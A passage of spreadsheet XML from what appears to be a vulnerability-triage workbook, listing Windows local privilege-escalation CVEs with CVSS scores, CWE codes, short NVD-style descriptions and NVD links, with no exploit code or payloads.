          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="2152">
      <c r="A2152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69424</t>
        </is>
      </c>
      <c r="C2152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2152" s="5" t="inlineStr"/>
      <c r="F2152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2152" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2152" s="5" t="inlineStr"/>
      <c r="I2152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2152" s="5" t="inlineStr"/>
      <c r="K2152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2152" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t>
        </is>
      </c>
    </row>
    <row r="2153">
      <c r="A2153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="C2153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2153" s="5" t="inlineStr"/>
      <c r="F2153" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2153" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2153" s="5" t="inlineStr"/>
      <c r="I2153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2153" s="5" t="inlineStr"/>
      <c r="K2153" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2153" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="2154">
      <c r="A2154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69432</t>
        </is>
      </c>
      <c r="C2154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2154" s="5" t="inlineStr"/>
      <c r="F2154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2154" s="5" t="inlineStr"/>
      <c r="H2154" s="5" t="inlineStr"/>
      <c r="I2154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2154" s="5" t="inlineStr"/>
      <c r="K2154" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2154" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t>
        </is>
      </c>
    </row>
    <row r="2155">
      <c r="A2155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69433</t>
        </is>
      </c>
      <c r="C2155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2155" s="5" t="inlineStr"/>
      <c r="F2155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2155" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2155" s="5" t="inlineStr"/>
      <c r="I2155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2155" s="5" t="inlineStr"/>
      <c r="K2155" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2155" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t>
        </is>
      </c>
    </row>
    <row r="2156">
      <c r="A2156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69436</t>
        </is>
      </c>
      <c r="C2156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2156" s="5" t="inlineStr"/>
      <c r="F2156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2156" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2156" s="5" t="inlineStr"/>
      <c r="I2156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2156" s="5" t="inlineStr"/>
      <c r="K2156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t>
        </is>
      </c>
    </row>
    <row r="2157">
      <c r="A2157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69444</t>
        </is>
      </c>
      <c r="C2157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2157" s="5" t="inlineStr"/>
      <c r="F2157" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2157" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2157" s="5" t="inlineStr"/>
      <c r="I2157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2157" s="5" t="inlineStr"/>
      <c r="K2157" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2157" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t>
        </is>
      </c>
    </row>
    <row r="2158">
      <c r="A2158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69445</t>
        </is>
      </c>
      <c r="C2158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2158" s="5" t="inlineStr"/>
      <c r="F2158" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2158" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2158" s="5" t="inlineStr"/>
      <c r="I2158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2158" s="5" t="inlineStr"/>
      <c r="K2158" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2158" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t>
        </is>
      </c>
    </row>
    <row r="2159">
      <c r="A2159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69447</t>
        </is>
      </c>
      <c r="C2159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2159" s="5" t="inlineStr"/>
      <c r="F2159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2159" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2159" s="5" t="inlineStr"/>
      <c r="I2159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2159" s="5" t="inlineStr"/>
      <c r="K2159" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2159" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t>
        </is>
      </c>
    </row>
    <row r="2160">
      <c r="A2160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69450</t>
        </is>
      </c>
      <c r="C2160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2160" s="5" t="inlineStr"/>
      <c r="F2160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2160" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2160" s="5" t="inlineStr"/>
      <c r="I2160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2160" s="5" t="inlineStr"/>
      <c r="K2160" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2160" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t>
        </is>
      </c>
    </row>
    <row r="2161">
      <c r="A2161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69455</t>
        </is>
      </c>
      <c r="C2161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2161" s="5" t="inlineStr"/>
      <c r="F2161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2161" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2161" s="5" t="inlineStr"/>
      <c r="I2161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2161" s="5" t="inlineStr"/>
      <c r="K2161" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2161" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t>
        </is>
      </c>
    </row>
    <row r="2162">
      <c r="A2162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="C2162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2162" s="5" t="inlineStr"/>
      <c r="F2162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2162" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2162" s="5" t="inlineStr"/>
      <c r="I2162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2162" s="5" t="inlineStr"/>
      <c r="K2162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="2163">
      <c r="A2163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69459</t>
        </is>
      </c>
      <c r="C2163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2163" s="5" t="inlineStr"/>
      <c r="F2163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2163" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2163" s="5" t="inlineStr"/>
      <c r="I2163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2163" s="5" t="inlineStr"/>
      <c r="K2163" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2163" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t>
        </is>
      </c>
    </row>
    <row r="2164">
      <c r="A2164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69467</t>
        </is>
      </c>
      <c r="C2164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2164" s="5" t="inlineStr"/>
      <c r="F2164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2164" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2164" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I2164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2164" s="5" t="inlineStr"/>
      <c r="K2164" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2164" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t>
        </is>
      </c>
    </row>
    <row r="2165">
      <c r="A2165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="C2165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2165" s="5" t="inlineStr"/>
      <c r="F2165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2165" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2165" s="5" t="inlineStr"/>
      <c r="I2165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2165" s="5" t="inlineStr"/>
      <c r="K2165" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L2165" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="2166">
      <c r="A2166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="C2166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2166" s="5" t="inlineStr"/>
      <c r="F2166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2166" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2166" s="5" t="inlineStr"/>
      <c r="I2166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2166" s="5" t="inlineStr"/>
      <c r="K2166" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2166" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="2167">
      <c r="A2167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69478</t>
        </is>
      </c>
      <c r="C2167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2167" s="5" t="inlineStr"/>
      <c r="F2167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2167" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2167" s="5" t="inlineStr"/>
      <c r="I2167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2167" s="5" t="inlineStr"/>
      <c r="K2167" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2167" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t>
        </is>
      </c>
    </row>
    <row r="2168">
      <c r="A2168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69480</t>
        </is>
      </c>
      <c r="C2168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2168" s="5" t="inlineStr"/>
      <c r="F2168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2168" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2168" s="5" t="inlineStr"/>
      <c r="I2168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2168" s="5" t="inlineStr"/>
      <c r="K2168" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t>
        </is>
      </c>
    </row>
    <row r="2169">
      <c r="A2169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="C2169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2169" s="5" t="inlineStr"/>
      <c r="F2169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2169" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2169" s="5" t="inlineStr"/>
      <c r="I2169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2169" s="5" t="inlineStr"/>
      <c r="K2169" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2169" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="2170">
      <c r="A2170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69508</t>
        </is>
      </c>
      <c r="C2170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2170" s="5" t="inlineStr"/>
      <c r="F2170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2170" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2170" s="5" t="inlineStr"/>
      <c r="I2170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2170" s="5" t="inlineStr"/>
      <c r="K2170" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2170" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t>
        </is>
      </c>
    </row>
    <row r="2171">
      <c r="A2171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69509</t>
        </is>
      </c>
      <c r="C2171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2171" s="5" t="inlineStr"/>
      <c r="F2171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2171" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2171" s="5" t="inlineStr"/>
      <c r="I2171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2171" s="5" t="inlineStr"/>
      <c r="K2171" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L2171" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t>
        </is>
      </c>
    </row>
    <row r="2172">
      <c r="A2172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69513</t>
        </is>
      </c>
      <c r="C2172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2172" s="5" t="inlineStr"/>
      <c r="F2172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2172" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2172" s="5" t="inlineStr"/>
      <c r="I2172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2172" s="5" t="inlineStr"/>
      <c r="K2172" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2172" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t>
        </is>
      </c>
    </row>
    <row r="2173">
      <c r="A2173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69528</t>
        </is>
      </c>
      <c r="C2173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2173" s="5" t="inlineStr"/>
      <c r="F2173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2173" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2173" s="5" t="inlineStr"/>
      <c r="I2173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2173" s="5" t="inlineStr"/>
      <c r="K2173" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2173" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t>
        </is>
      </c>
    </row>
    <row r="2174">
      <c r="A2174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="C2174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2174" s="5" t="inlineStr"/>
      <c r="F2174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2174" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2174" s="5" t="inlineStr"/>
      <c r="I2174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2174" s="5" t="inlineStr"/>
      <c r="K2174" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2174" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="2175">
      <c r="A2175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69534</t>
        </is>
      </c>
      <c r="C2175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2175" s="5" t="inlineStr"/>
      <c r="F2175" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2175" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2175" s="5" t="inlineStr"/>
      <c r="I2175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2175" s="5" t="inlineStr"/>
      <c r="K2175" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2175" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t>
        </is>
      </c>
    </row>
    <row r="2176">
      <c r="A2176" s="5" t="inlineStr">
        <is>
